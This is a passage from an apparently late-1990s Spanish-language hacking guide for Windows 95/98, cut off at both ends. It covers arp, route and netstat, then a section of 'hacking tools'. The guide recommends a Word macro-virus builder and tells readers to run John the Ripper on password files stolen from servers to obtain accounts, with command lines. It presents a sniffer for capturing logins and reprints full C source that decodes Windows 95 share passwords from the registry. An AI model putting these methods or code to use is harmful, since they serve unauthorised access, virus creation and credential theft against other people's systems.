  1292.                 If not present, the first applicable interface will be used.
  1293.   Example:
  1294.     > arp -s 157.55.85.212   00-aa-00-62-c6-09  .... Adds a static entry.
  1295.     > arp -a                                    .... Displays the arp table.
  1296.  
  1297.   Y como viene siendo habitual, os remito a aprender ingles y a jugar con las
  1298.   distintos parametros que tiene este comando.
  1299.  
  1300.    4-13. Route.
  1301.  
  1302.   Este comando nos permitira manejar la tabla local TCP/IP. Al igual que los
  1303.   demas comandos dispone de varios parametros, los cuales son los siguientes:
  1304.  
  1305.   C:\WINDOWS>route
  1306.  
  1307.   Manipulates network routing tables.
  1308.  
  1309.   ROUTE [-f] [command [destination] [MASK netmask] [gateway] [METRIC metric]]
  1310.  
  1311.     -f           Clears the routing tables of all gateway entries.  If this is
  1312.                  used in conjunction with one of the commands, the tables are
  1313.                  cleared prior to running the command.
  1314.  
  1315.     command      Must be one of four:
  1316.                    PRINT     Prints   a  route
  1317.                    ADD       Adds     a  route
  1318.                    DELETE    Deletes  a  route
  1319.                    CHANGE    Modifies an existing route
  1320.  
  1321.     destination  Specifies the destination host.
  1322.  
  1323.     MASK         Specifies that the next parameter is the 'netmask' value.
  1324.  
  1325.     netmask      Specifies a subnet mask value to be associated
  1326.                  with this route entry. If not specified, it defaults to
  1327.                  255.255.255.255.
  1328.  
  1329.     gateway      Specifies gateway.
  1330.  
  1331.     METRIC       Specifies that the next paramenter 'metric' is the
  1332.                  cost for this destination
  1333.  
  1334.   All symbolic names used for destination are looked up in the network
  1335.   database file NETWORKS. The symbolic names for gateway are looked up in the
  1336.   host name database file HOSTS.
  1337.  
  1338.   If the command is PRINT or DELETE, wildcards may be used for the destination
  1339.   and gateway, or the gateway argument may be omitted.
  1340.   Diagnostic Notes:
  1341.       Invalid MASK generates an error, that is when (DEST & MASK) != DEST.
  1342.       Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1
  1343.                The route addition failed: 87
  1344.  
  1345.   Examples:
  1346.  
  1347.       > route PRINT
  1348.       > route   ADD 157.0.0.0     MASK 255.0.0.0   157.55.80.1 METRIC  3
  1349.                     ^destination       ^mask       ^gateway            ^metric
  1350.       > route PRINT
  1351.       > route DELETE 157.0.0.0
  1352.       > route PRINT
  1353.  
  1354.   Creo que queda bastante claro, incluso provee distintos ejemplos para
  1355.   familiarizarnos con este comando.
  1356.  
  1357.    4-14. Netstat.
  1358.  
  1359.   Este comando nos puede ser muy util para saber que conexiones tenemos
  1360.   activas en el momento de ejecutar este comando, para conexiones TCP/IP, lo
  1361.   ejecutamos asi, solo que en mi caso no saldra ya que no estoy conectado en
  1362.   este momento:
  1363.  
  1364.   C:\WINDOWS>netstat
  1365.  
  1366.   Active Connections
  1367.  
  1368.     Proto  Local Address          Foreign Address        State
  1369.  
  1370.   Como veis no sale nada, pero si lo ejecutais cuando esteis conectados, ya
  1371.   vereis :) Como siempre este comando dispone de varios parametros, que son
  1372.   los siguientes:
  1373.  
  1374.   C:\WINDOWS>netstat /?
  1375.  
  1376.   Displays protocol statistics and current TCP/IP network connections.
  1377.  
  1378.   NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
  1379.  
  1380.     -a          Displays all connections and listening ports.
  1381.     -e          Displays Ethernet statistics. This may be combined with the -s
  1382.                 option.
  1383.     -n          Displays addresses and port numbers in numerical form.
  1384.     -p proto    Shows connections for the protocol specified by proto; proto
  1385.                 may be TCP or UDP.  If used with the -s option to display
  1386.                 per-protocol statistics, proto may be TCP, UDP, or IP.
  1387.     -r          Displays the routing table.
  1388.     -s          Displays per-protocol statistics.  By default, statistics are
  1389.                 shown for TCP, UDP and IP; the -p option may be used to
  1390.                 specify a subset of the default.
  1391.     interval    Redisplays selected statistics, pausing interval seconds
  1392.                 between each display.  Press CTRL+C to stop redisplaying
  1393.                 statistics.  If omitted, netstat will print the current
  1394.                 configuration information once.
  1395.  
  1396.   Ya solo nos queda jugar con los distintos parametros y aprender :)
  1397.  
  1398.   5. Utilizacion De Tools.
  1399.  
  1400.   En esta seccion os explicare diferentes tools que podeis usar para hacking,
  1401.   por supuesto hay que buscarlas por Internet, no pondre el url para
  1402.   encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe,
  1403.   pero os dire como se llama el programa asi lo podras buscar ademas esto
  1404.   tambien te servira para que te espabiles y sepas buscar cosas por Internet.
  1405.  
  1406.   Logicamente esta guia es para win95/98 y los programas que explicare seran
  1407.   para win95/98 pero tambien me veo obligado a explicar varias tools que no
  1408.   son de win95/98 propiamente sino de MS-DOS pero que son necesarias y ademas
  1409.   corren en modo MS-DOS de win95/98.
  1410.  
  1411.    5-1. Skamwerks lab version 1.1b
  1412.  
  1413.   Este programa es un util herramienta que nos ayuda a crear de forma rapida
  1414.   virus macro, o sea para el Word. Tiene que estar instalado el Word para
  1415.   que este programa nos funcione.
  1416.  
  1417.   Al ejecutar el programa nos aparecera una ventana con 2 botones los caules
  1418.   son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".
  1419.   El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus
  1420.   de macro ya que nos moveremos por varios menus y crearemos un virus de
  1421.   forma rapida y facilmente. La otra opcion, "Advanced Users" es para
  1422.   aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya
  1423.   que podemos meter codigo Word basic directamente y asi crear un virus a
  1424.   nuestro gusto.
  1425.  
  1426.   Como este no es un curso sobre virus, no me voy a enrollar sobre la
  1427.   utilizacion exacta del programa. En mi opinion es un buen programa,
  1428.   en ingles :) programado en C++.
  1429.  
  1430.    5-2. WaReZ! Version 95.12.31
  1431.  
  1432.   Este programa es un cliente FTP que muestra los directorios ocultos en un
  1433.   servidor, util si nos metemos en algun sitio sospechoso. Como ya es
  1434.   costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL
  1435.   correctamente.
  1436.  
  1437.   Al igual que antes tampoco hay que explicar mucho sobre este programa ya
  1438.   que su Interface es igual que el cliente WS_FTP que suele ser muy familiar
  1439.   para todos, por lo que no encontraremos mucha dificultad en su manejo.
  1440.  
  1441.    5-3. John the ripper v1.4.
  1442.  
  1443.   Esta magnifica tool no es propiamente de win95/98 pero seria un pecado no
  1444.   hablar de ella, cuando corre sobre win95/98 de maravilla (bueno, dentro de
  1445.   lo que cabe :). John, como se le conoce, sirve para crackear un fichero
  1446.   unix de password (el conocido etc/passwd, como ya digo aprended algo de
  1447.   unix).
  1448.  
  1449.   Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer
  1450.   es usar el John para sacar cuentas, pero no solo basta esto sino tambien
  1451.   necesitamos un buen diccionario y una combinacion de suerte y paciencia.
  1452.  
  1453.   Supongamos que ya tenemos todo (fichero passwd, John y un diccionario),
  1454.   entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo
  1455.   llamamos sin nigun parametro nos saldran un listado de opciones, esto seria
  1456.   asi:
  1457.  
  1458.   c:\>john
  1459.  
  1460.   Usage: john [flags] [passwd files]
  1461.   Flags:-pwfile:<file>[,..]     specify passwd file(s)
  1462.         -wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
  1463.         -rules                  enable rules for wordlist mode
  1464.         -incremental[:<mode>]   incremental mode [using john.ini entry <mode>]
  1465.         -single                 single crack mode
  1466.         -external:<mode>        external mode, using john.ini entry <mode>
  1467.         -restore[:<file>]       restore session [from <file>]
  1468.         -makechars:<file>       make a charset, <file> will be overwritten
  1469.         -show                   show cracked passwords
  1470.         -test                   perform a benchmark
  1471.         -users:<login|uid>[,..] crack this (these) user(s) only
  1472.         -shells:[!]<shell>[,..] crack users with this (these) shell(s) only
  1473.         -salts:[!]<count>      crack salts with at least <count> accounts only
  1474.         -lamesalts              assume plaintext passwords were used as salts
  1475.         -timeout:<time>         abort session after a period of <time> minutes
  1476.         -list                   list each word
  1477.         -beep -quiet            beep or don't beep when a password is found
  1478.         -noname -nohash        don't use memory for login names or hash tables
  1479.         -des -md5               force DES or MD5 mode
  1480.  
  1481.   Veis? :), y como siempre no explicare que es cada opcion os lo dejo para
  1482.   que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero,
  1483.   para ello escogermos la opcion "single", ya que el john no nos pedira
  1484.   un fichero de diccionario, si fuese el caso que no tenemos, ponemos:
  1485.  
  1486.   c:\>john -single passwd
  1487.  
  1488.   Y el John se pondra a trabajar, cuando halla acabo creara un fichero
  1489.   llamado "John.pot" donde se almacenaran los passwords encriptados con
  1490.   su correspodiente passwords desencriptado (esta definicion no es del
  1491.   todo correcta pero es para que lo entendais) y ya tenemos unas cuentas
  1492.   de acceso al servidor.
  1493.  
  1494.   Este metodo va bien para la primera pasado con el John pero luego conviene
  1495.   usar un diccionario y con el diccionario seria de la siguiente manera:
  1496.  
  1497.   c:\>john -wordfile:spain.txt passwd
  1498.  
  1499.   El John seguiria el mismo proceso antes descrito, por supuesto si el
  1500.   fichero "John.pot" esta creado ya, les añadira los resultados obtenidos
  1501.   a este fichero, por cierto este fichero tiene atributo de solo lectura.
  1502.  
  1503.   Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis
  1504.   a manejar correctamente. Referente a los diccionarios hay varias
  1505.   herramientas que corren bajo MS-DOS que crean diccionarios o tambien
  1506.   podeis buscar por Internet ya que hay varios web's llenos de diccionarios.
  1507.  
  1508.   Decir que la ultima version del John The Ripper es la 1.5.
  1509.  
  1510.    5-4. Gobbler v 2.1.
  1511.  
  1512.   Volvemos a la carga con otro programa que no es del win95/98 propiamente,
  1513.   pero es un sniffer que podemos usar bajo win95 en una red Ethernet. Un
  1514.   Sniffer para aquellos que no sepan, es un programa que captura los paquetes 
  1515.   que pasan por una red y asi se pueden conseguir logins, passowrds u otro
  1516.   tipo de informacion que querramos, logicamente si los paquetes estan
  1517.   encriptados, esto dificultara el proceso, ya que habra que desencriptarlos
  1518.   si se puede.
  1519.                                                              
  1520.   Como siempre abrimos una ventana y ejecutamos el programa de la siguiente
  1521.   manera:
  1522.  
  1523.   c:\>gobbler
  1524.  
  1525.   Y se activara el programa y veremos una serie de ventanas, en este punto,
  1526.   pulsamos el <ESC> y saldra una ventana con un menu. Ahora tenemos que
  1527.   configurar el programa para nuestra red, la verdad es que es muy sencillo
  1528.   de utilizar, con un poco de practica dominaremos este sniffer facilmente.
  1529.   Como sugerencia conviene leer el fichero de documentacion que trae, ya
  1530.   que explica como configurar el programa.
  1531.  
  1532.    5-5. Sharepasswd.
  1533.  
  1534.   Este programa desencripta el passorwd de win95/98. Esta en lenguaje C, como
  1535.   supongo todo el mundo tiene que tener un compilador en C y si no ya estas
  1536.   buscando uno, que hay muchos y gratis por Internet. No veo la necesidad
  1537.   de explicaros el programa ya que tambien incluyo la explicacion del
  1538.   autor la cual esta muy bien, logicamente.
  1539.  
  1540. ------------ Codigo Fuente ---------------------------------------------------
  1541.  
  1542. /* This program takes an 'encrypted' Windows 95 share password and decrypts it
  1543.  * Look at:
  1544.  * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
  1545.  * to find a machine's shares.  Within the data for each share are two
  1546.  * registry entries, Parm1enc and Parm2enc.  Parm1enc is the "Full access"
  1547.  * password.  Parm2enc is the "Read only" password.
  1548.  *
  1549.  * David Ross  2/9/96
  1550.  * snakey@cs.umd.edu
  1551.  *
  1552.  * Do not distribute this program for any commercial purpose without first
  1553.  * contacting me for permission.
  1554.  *
  1555.  * DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
  1556.  *
  1557.  * A technical description of the 'code' can be found later on in this
  1558.  * document. 
  1559.  *
  1560.  * Oh yeah...  a totally unsolicited self promotion here...  If anyone has
  1561.  * a job for a junior year Computer Science student for summer '96, please
  1562.  * let me know!  I'm familiar with Windows and Mac networking (especially 
  1563.  * involving TCP/IP), fluent in C and C++, and working on becoming a
  1564.  * proficient Windows programmer.
  1565.  *
  1566.  */
  1567.  
  1568. #include <stdio.h>
  1569. #include <string.h>
  1570.  
  1571. #define BUFFER 30
  1572.  
  1573. int DecodeCharOne(unsigned char *);
  1574. int DecodeCharTwo(unsigned char *);
  1575. int DecodeCharThree(unsigned char *);
  1576. int DecodeCharFour(unsigned char *);
  1577. int DecodeCharFive(unsigned char *);
  1578. int DecodeCharSix(unsigned char *);
  1579. int DecodeCharSeven(unsigned char *);
  1580. int DecodeCharEight(unsigned char *);
  1581.  
  1582. main() {
  1583.  
  1584.   int i;           /* Generic counter */
  1585.   int eocc = 0;    /* Records if there has been an error */
  1586.  
  1587.   /* The following structure stores the encoded bytes.  Decoded values
  1588.    * replace the encoded values as the decoding process moves along
  1589.    * The initial values show here are not used and are unimportant
  1590.    */
  1591.   unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
  1592.   unsigned short tempshort;   /* Used as a go-between from sscanf() to
  1593.                  mybytes[] so unaligned data accesses
  1594.                  don't occur */
  1595.  
  1596.   int goupto = 0;  /* Records how many characters there are to be decoded */
  1597.   
  1598.   /* The following code handles input */
  1599.   char inpt[BUFFER];
  1600.   char *inptptr;
  1601.   
  1602.   printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
  1603.   fgets(inpt, BUFFER, stdin);
  1604.   
  1605.   inptptr = strtok(inpt, " ");
  1606.   if (inpt[0] != '\n')
  1607.     while ((inptptr != NULL) && (goupto < 8)) {
  1608.       sscanf(inptptr, "%hx", &tempshort);
  1609.       mybytes[goupto++] = tempshort;
  1610.       inptptr = strtok(NULL, " ");
  1611.     }
  1612.   
  1613.   /* Decode all the characters.  I could have made this stop immediately
  1614.    * after an error has been found, but it really doesn't matter
  1615.    */
  1616.   if (!DecodeCharOne(&mybytes[0])) eocc = 1;
  1617.   if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
  1618.   if (!DecodeCharThree(&mybytes[2])) eocc = 1;
  1619.   if (!DecodeCharFour(&mybytes[3])) eocc = 1;
  1620.   if (!DecodeCharFive(&mybytes[4])) eocc = 1;
  1621.   if (!DecodeCharSix(&mybytes[5])) eocc = 1;
  1622.   if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
  1623.   if (!DecodeCharEight(&mybytes[7])) eocc = 1;
  1624.  
  1625.   /* If the password could be decoded, print it */
  1626.   if (eocc) printf("The encrypted password is invalid.\n");
  1627.   else {
  1628.     printf("The decoded password is: \"");
  1629.     for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
  1630.     printf("\"\n");
  1631.   }
  1632. }  /* End of main() */
  1633.  
  1634. /*
  1635.  * I will document this function, but not the seven other functions
  1636.  * which decode the subsequent seven characters.  All of these functions
  1637.  * are essentially the same.  Multiple functions are necessary though
  1638.  * because each column of the password has a different set of encoding
  1639.  * patterns.
  1640.  *
  1641.  * The following section will attempt to explain the encoding scheme
  1642.  * for share passwords as stored in the Windows 95 registry.  I will
  1643.  * try to explain this as clearly as I can, however I really have no
  1644.  * background in encryption.  If you have any questions, please feel
  1645.  * free to send them to me at snakey@cs.umd.edu.
  1646.  *
  1647.  * First off, share passwords can be anywhere from one character to
  1648.  * eight.  "Read only" passwords and "Full access" passwords both use
  1649.  * the same encoding scheme, and so they both can be decoded by this
  1650.  * program.  There is a one-to-one relationship between the number of
  1651.  * characters in a password and the number of bytes in the encoded
  1652.  * password stored in the registry.  In fact, each encoded byte directly
  1653.  * corresponds to the letter in the corresponding column of the
  1654.  * unencoded password!  Ie: If I change a password "passwd" to "masswd",
  1655.  * only the first byte of the encrypted password will change.  Knowing
  1656.  * this, it is easy to see that all that needs to be done to decode
  1657.  * the password is to find a mapping from an encoded byte to a decoded
  1658.  * letter.  That's what this program does.  Unfortunately, things get
  1659.  * a little tricky because a letter in the first column of a password
  1660.  * is encoded using a slightly different algorithm than a letter
  1661.  * in the second column, and so on.
  1662.  *
  1663.  * There is another complexity which we do not really need to worry
  1664.  * about to a great extent, but we still need to be aware of.  Many
  1665.  * characters, when entered into a password, map to the same encoded
  1666.  * byte.  The best example of this is that both 'A' and 'a' are the
  1667.  * same as far as share passwords are concerned.  There are numerous
  1668.  * other examples of this, and this allows us to effectively limit the
  1669.  * range of characters we need to be able to decode.  The range of
  1670.  * ASCII values we will have to be able to decode turns out to be
  1671.  * from 32 to 159.  ASCII values higher than 159 tend to map to
  1672.  * encoded bytes which also represent more normal ASCII values.  So
  1673.  * if a user manages to create a password with high ASCII values
  1674.  * in it, that password will still be decoded by this program.
  1675.  * Although the decoded password won't look the same as the original,
  1676.  * it will work just as well.
  1677.  *
  1678.  * With all of the preliminaries out of the way, I can now move on
  1679.  * to describing the mapping from an encoded byte to it's corresponding
  1680.  * ASCII value.  I think the best way to describe this would be through
  1681.  * a picture of exactly how the characters from 32 to 63 are mapped
  1682.  * out in the code for the first letter in a password.  This table goes
  1683.  * beyond the 80 column format maintained in the rest of this document,
  1684.  * but it is really the best solution.  If the table below doesn't look
  1685.  * right, load this file up in a text editor that supports greater than
  1686.  * 80 columns.
  1687.  *
  1688.  *   Encoded byte (hex)    - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10
  1689.                               0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00
  1690.  *   ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37
  1691.                               58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53
  1692.  *   Pair #                - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|
  1693.                               |14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|
  1694.  *   Quad #                - |__________2__________| |__________1__________|
  1695.                               |__________3__________| |__________4__________|
  1696.  *   32 byte block #       - |______________________________________________
  1697.                               1______________________________________________|
  1698.  *
  1699.  * The "Pair #", "Quad #", and "32 byte block #" rows each are there to
  1700.  * make the general ordering of the code more visible.  The first thing to
  1701.  * note is that the range of encoded byte values runs from 00 to 1f.  This
  1702.  * will not always be the case for the first set of 32 characters.  In
  1703.  * fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not in
  1704.  * the range of 20 to 3f in encoded form.  I never concerned myself with
  1705.  * predicting exactly where each of the four 32 byte ranges are aligned
  1706.  * within the range of 0 to 256.  In my decoding scheme, I simply specify
  1707.  * the location of the first character in a 32 byte block (which I have
  1708.  * pre-determined via experimentation) and determine the locations of the
  1709.  * rest of the characters in the block relative to the inital value.  This
  1710.  * amounts to a total of four hand-decoded characters for the entire code.
  1711.  *
  1712.  * From a starting point which is given (in this case the fact that ASCII
  1713.  * 32 is encoded as 0x15), my decoding scheme follows a pattern that is
  1714.  * probably already apparent to you if you have examined the above table
  1715.  * closely.  First, if the encoded byte number is odd, it simple subtracts
  1716.  * one from this byte number to get the byte number of the encoded form of
  1717.  * the subsequent character.  This is much more simple than it sounds.
  1718.  * As an example, given that the code for ASCII 32 is 0x15, the program
  1719.  * knows that the code for ASCII 33 must be 0x14.  The tricky part is that
  1720.  * this is not always true for every code.  Recall that there is a different
  1721.  * coding scheme for each of the 8 columns in a password, and that the above
  1722.  * table only describes the coding scheme for the first column.  Other columns
  1723.  * reverse this relationship between the two ASCII values of a certain pair.
  1724.  *
  1725.  * Pairs are grouped into units of four, appearing in a predefined pattern.
  1726.  * In this case, the first pair (by first I mean the pair with the lowest
  1727.  * set of ASCII values) is put in the second slot of a quad (which contains
  1728.  * four pairs).  The second pair is put in the first slot, the third is put
  1729.  * in the fourth quad, and the fourth is put in the third quad.  This changes
  1730.  * depending on the specific code used (of the 8 possible).
  1731.  *
  1732.  * Quads also fill a block in the same manner, however the ordering is NOT
  1733.  * necessarily the same as the way pairs fit into quads!  As I described
  1734.  * above, there are four blocks, and they fit into the entire range of
  1735.  * 128 values just as pairs fit into quads and quads fit into blocks,
  1736.  * via a pattern determined by whoever invented this encoding scheme.  It
  1737.  * is important to realize that the range of 128 possible encoded
  1738.  * values can be anywhere within the range of 0 to 256.  Ie: One block can
  1739.  * be positioned from 0x00 to 0x1f, while another block in the same code
  1740.  * can be positioned from 0xa0 to 0xbf.
  1741.  *
  1742.  * I realize that the above description is a bit complex, and it doesn't
  1743.  * really cover much of _how_ my program decodes the the encoded values.
  1744.  * If you honestly can't understand a word I've said, just go back to
  1745.  * the table and really take a long look at it.  Print it out, put it
  1746.  * under your pillow when you go to sleep.  Sooner or later the order
  1747.  * of it all will dawn on you and you should be able to step through
  1748.  * my code and see how it derives its answer, at least for the
  1749.  * DecodeCharOne() routine.  Seven other tables (which I have rough
  1750.  * copies of here on notebook paper) were needed to come up with
  1751.  * the seven other decoders for the seven other character places.
  1752.  *
  1753.  */
  1754.  
  1755. int DecodeCharOne(unsigned char *mychar) {
  1756.   int i = 0;        /* Keeps track of the decoded character # minus 32 */
  1757.   int cletter = 1;  /* Sets the current letter of the 8 char quad */
  1758.   int blockl1 = 1;  /* Sets the current quad */
  1759.   int blockl2 = 1;  /* Sets the current 32 char block */
  1760.   int retval = 1;
  1761.   /* We are on this col of the table: */
  1762.   unsigned char code = 0x15;    /* The code for a space */
  1763.   
  1764.   /* This is the main loop.  It walks through each decoded character, finds
  1765.    * its corresponding encoded value, and looks to see if that's the same as
  1766.    * the encoded value we are looking for.  If it is, we have found our
  1767.    * decoded character!
  1768.    */
  1769.   while((i<256) && (code != *mychar)) {
  1770.     switch (cletter) {
  1771.     case 1:
  1772.       code--;
  1773.       cletter++;
  1774.       break;
  1775.     case 2:
  1776.       code += 3;
  1777.       cletter++;
  1778.       break;
  1779.     case 3:
  1780.       code--;
  1781.       cletter++;
  1782.       break;
  1783.     case 4:
  1784.       code -= 5;
  1785.       cletter++;
  1786.       break;
  1787.     case 5:
  1788.       code--;
  1789.       cletter++;
  1790.       break;
  1791.     case 6:
  1792.       code+=3;
  1793.       cletter++;
  1794.       break;
  1795.     case 7:
  1796.       code--;
  1797.       cletter++;
  1798.       break;
  1799.     case 8:
  1800.       cletter = 1;
  1801.       switch (blockl1) {    /* After we hit character number 8, we have */
  1802.       case 1:               /* to do a relative jump to the next quad */
  1803.     code += 11;
  1804.     blockl1++;
  1805.     break;
  1806.       case 2:
  1807.     code -= 21;
  1808.     blockl1++;
  1809.     break;
  1810.       case 3:
  1811.     code += 11;
  1812.     blockl1++;
  1813.     break;
  1814.       case 4:
  1815.     blockl1 = 1;
  1816.     switch (blockl2) {       /* After we hit the last quad, we have to */
  1817.     case 1:                  /* jump to the next 32 character block. */
  1818.       code = 0x75;
  1819.       blockl2++;
  1820.       break;
  1821.     case 2:
  1822.       code = 0x55;
  1823.       blockl2++;
  1824.       break;
  1825.     case 3:
  1826.       code = 0xb5;
  1827.       blockl2++;
  1828.       break;
  1829.     case 4:
  1830.       code = 0x15;
  1831.       blockl2 = 1;
  1832.       break;
  1833.     }
  1834.     break;
  1835.       }
  1836.       break;
  1837.     }
  1838.     i++;
  1839.   }
  1840.   if (i == 256) retval = 0;
  1841.   else *mychar = i + 32;
  1842.   return retval;
  1843. }  /* End of DecodeCharOne() */
  1844.  
  1845. int DecodeCharTwo(unsigned char *mychar) {
  1846.   int i = 0;
  1847.   int cletter = 1;
  1848.   int blockl1 = 1;
  1849.   int blockl2 = 1;
  1850.   int retval = 1;
  1851.   unsigned char code = 0xba;    /* The code for a space */
  1852.   while((i<256) && (code != *mychar)) {
  1853.     switch (cletter) {
  1854.     case 1:
  1855.       code++;
  1856.       cletter++;
  1857.       break;
  1858.     case 2:
  1859.       code -= 3;
  1860.       cletter++;
  1861.       break;
  1862.     case 3:
  1863.       code++;
  1864.       cletter++;
  1865.       break;
  1866.     case 4:
  1867.       code += 5;
  1868.       cletter++;
  1869.       break;
  1870.     case 5:
  1871.       code++;
  1872.       cletter++;
  1873.       break;
  1874.     case 6:
  1875.       code -= 3;
  1876.       cletter++;
  1877.       break;
  1878.     case 7:
  1879.       code++;
  1880.       cletter++;
  1881.       break;
  1882.     case 8:
  1883.       cletter = 1;
  1884.       switch (blockl1) {
  1885.       case 1:
  1886.           code -= 11;
  1887.     blockl1++;
  1888.     break;
  1889.       case 2:
  1890.     code -= 11;
  1891.     blockl1++;
  1892.     break;
  1893.       case 3:
  1894.     code -= 11;
  1895.     blockl1++;
  1896.     break;
  1897.       case 4:
  1898.     blockl1 = 1;
  1899.     switch (blockl2) {
  1900.     case 1:
  1901.       code = 0xda;
  1902.       blockl2++;
  1903.       break;
  1904.     case 2:
  1905.       code = 0xfa;
  1906.       blockl2++;
  1907.       break;
  1908.     case 3:
  1909.       code = 0x1a;
  1910.       blockl2++;
  1911.       break;
  1912.     case 4:
  1913.       code = 0xba;
  1914.       blockl2 = 1;
  1915.       break;
  1916.     }
  1917.     break;
  1918.       }
  1919.       break;
  1920.     }
  1921.     i++;
  1922.   }
  1923.   if (i == 256) retval = 0;
  1924.   else *mychar = i + 32;
  1925.   return retval;
  1926. }  /* End of DecodeCharTwo() */
  1927.  
  1928. int DecodeCharThree(unsigned char *mychar) {
  1929.   int i = 0;
  1930.   int cletter = 1;
  1931.   int blockl1 = 1;
  1932.   int blockl2 = 1;
  1933.   int retval = 1;
  1934.   unsigned char code = 0x6d;    /* The code for a space */
  1935.   while((i<256) && (code != *mychar)) {
  1936.     switch (cletter) {
  1937.     case 1:
  1938.       code--;
  1939.       cletter++;
  1940.       break;
  1941.     case 2:
  1942.       code += 3;
  1943.       cletter++;
  1944.       break;
  1945.     case 3:
  1946.       code--;
  1947.       cletter++;
  1948.       break;
  1949.     case 4:
  1950.       code -= 5;
  1951.       cletter++;
  1952.       break;
  1953.     case 5:
  1954.       code--;
  1955.       cletter++;
  1956.       break;
  1957.     case 6:
  1958.       code += 3;
  1959.       cletter++;
  1960.       break;
  1961.     case 7:
  1962.       code--;
  1963.       cletter++;
  1964.       break;
  1965.     case 8:
  1966.       cletter = 1;
  1967.       switch (blockl1) {
  1968.       case 1:
  1969.         code -= 5;
  1970.         blockl1++;
  1971.     break;
  1972.       case 2:
  1973.         code += 27;
  1974.         blockl1++;
  1975.         break;
  1976.       case 3:
  1977.         code -= 5;
  1978.         blockl1++;
  1979.         break;
  1980.       case 4:
  1981.     blockl1 = 1;
  1982.     switch (blockl2) {
  1983.     case 1:
  1984.       code = 0x0d;
  1985.       blockl2++;
  1986.       break;
  1987.     case 2:
  1988.           code = 0x2d;
  1989.           blockl2++;
  1990.           break;
  1991.     case 3:
  1992.           code = 0xcd;
  1993.           blockl2++;
  1994.           break;
  1995.     case 4:
  1996.       code = 0x6d;
  1997.       blockl2 = 1;
  1998.           break;
  1999.     }
  2000.     break;
  2001.       }
  2002.       break;
  2003.     }
  2004.     i++;
  2005.   }
  2006.   if (i == 256) retval = 0;
  2007.   else *mychar = i + 32;
  2008.   return retval;
  2009. }  /* End of DecodeCharThree() */
  2010.  
  2011. int DecodeCharFour(unsigned char *mychar) {
  2012.   int i = 0;
  2013.   int cletter = 1;
  2014.   int blockl1 = 1;
  2015.   int blockl2 = 1;
  2016.   int retval = 1;
  2017.   unsigned char code = 0x86;    /* The code for a space */
  2018.   while((i<256) && (code != *mychar)) {
  2019.     switch (cletter) {
  2020.     case 1:
  2021.       code++;
  2022.       cletter++;
  2023.       break;
  2024.     case 2:
  2025.       code -= 3;
  2026.       cletter++;
  2027.       break;
  2028.     case 3:
  2029.       code++;
  2030.       cletter++;
  2031.       break;
  2032.     case 4:
  2033.       code -= 3;
  2034.       cletter++;
  2035.       break;
  2036.     case 5:
  2037.       code++;
  2038.       cletter++;
  2039.       break;
  2040.     case 6:
  2041.       code -= 3;
  2042.       cletter++;
  2043.       break;
  2044.     case 7:
  2045.       code++;
  2046.       cletter++;
  2047.       break;
  2048.     case 8:
  2049.       cletter = 1;
  2050.       switch (blockl1) {
  2051.       case 1:
  2052.         code += 13;
  2053.         blockl1++;
  2054.     break;
  2055.       case 2:
  2056.         code += 13;
  2057.         blockl1++;
  2058.         break;
  2059.       case 3:
  2060.         code += 13;
  2061.         blockl1++;
  2062.         break;
  2063.       case 4:
  2064.     blockl1 = 1;
  2065.     switch (blockl2) {
  2066.     case 1:
  2067.           code = 0xe6;
  2068.           blockl2++;
  2069.       break;
  2070.     case 2:
  2071.           code = 0xc6;
  2072.           blockl2++;
  2073.           break;
  2074.     case 3:
  2075.           code = 0x26;
  2076.           blockl2++;
  2077.           break;
  2078.     case 4:
  2079.       code = 0x86;
  2080.           blockl2 = 1;
  2081.           break;
  2082.     }
  2083.     break;
  2084.       }
  2085.       break;
  2086.     }
  2087.     i++;
  2088.   }
  2089.   if (i == 256) retval = 0;
  2090.   else *mychar = i + 32;
  2091.   return retval;
  2092. }   /* End of DecodeCharFour() */
  2093.  
  2094. int DecodeCharFive(unsigned char *mychar) {
  2095.   int i = 0;
  2096.   int cletter = 1;
  2097.   int blockl1 = 1;
  2098.   int blockl2 = 1;
  2099.   int retval = 1;
  2100.   unsigned char code = 0x73;    /* The code for a space */
  2101.   while((i<256) && (code != *mychar)) {
  2102.     switch (cletter) {
  2103.     case 1:
  2104.       code--;
  2105.       cletter++;
  2106.       break;
  2107.     case 2:
  2108.       code--;
  2109.       cletter++;
  2110.       break;
  2111.     case 3:
  2112.       code--;
  2113.       cletter++;
  2114.       break;
  2115.     case 4:
  2116.       code += 7;
  2117.       cletter++;
  2118.       break;
  2119.     case 5:
  2120.       code--;
  2121.       cletter++;
  2122.       break;
  2123.     case 6:
  2124.       code--;
  2125.       cletter++;
  2126.       break;
  2127.     case 7:
  2128.       code--;
  2129.       cletter++;
  2130.       break;
  2131.     case 8:
  2132.       cletter = 1;
  2133.       switch (blockl1) {
  2134.       case 1:
  2135.         code += 7;
  2136.     blockl1++;
  2137.     break;
  2138.       case 2:
  2139.         code -= 25;
  2140.         blockl1++;
  2141.         break;
  2142.       case 3:
  2143.         code += 7;
  2144.     blockl1++;
  2145.         break;
  2146.       case 4:
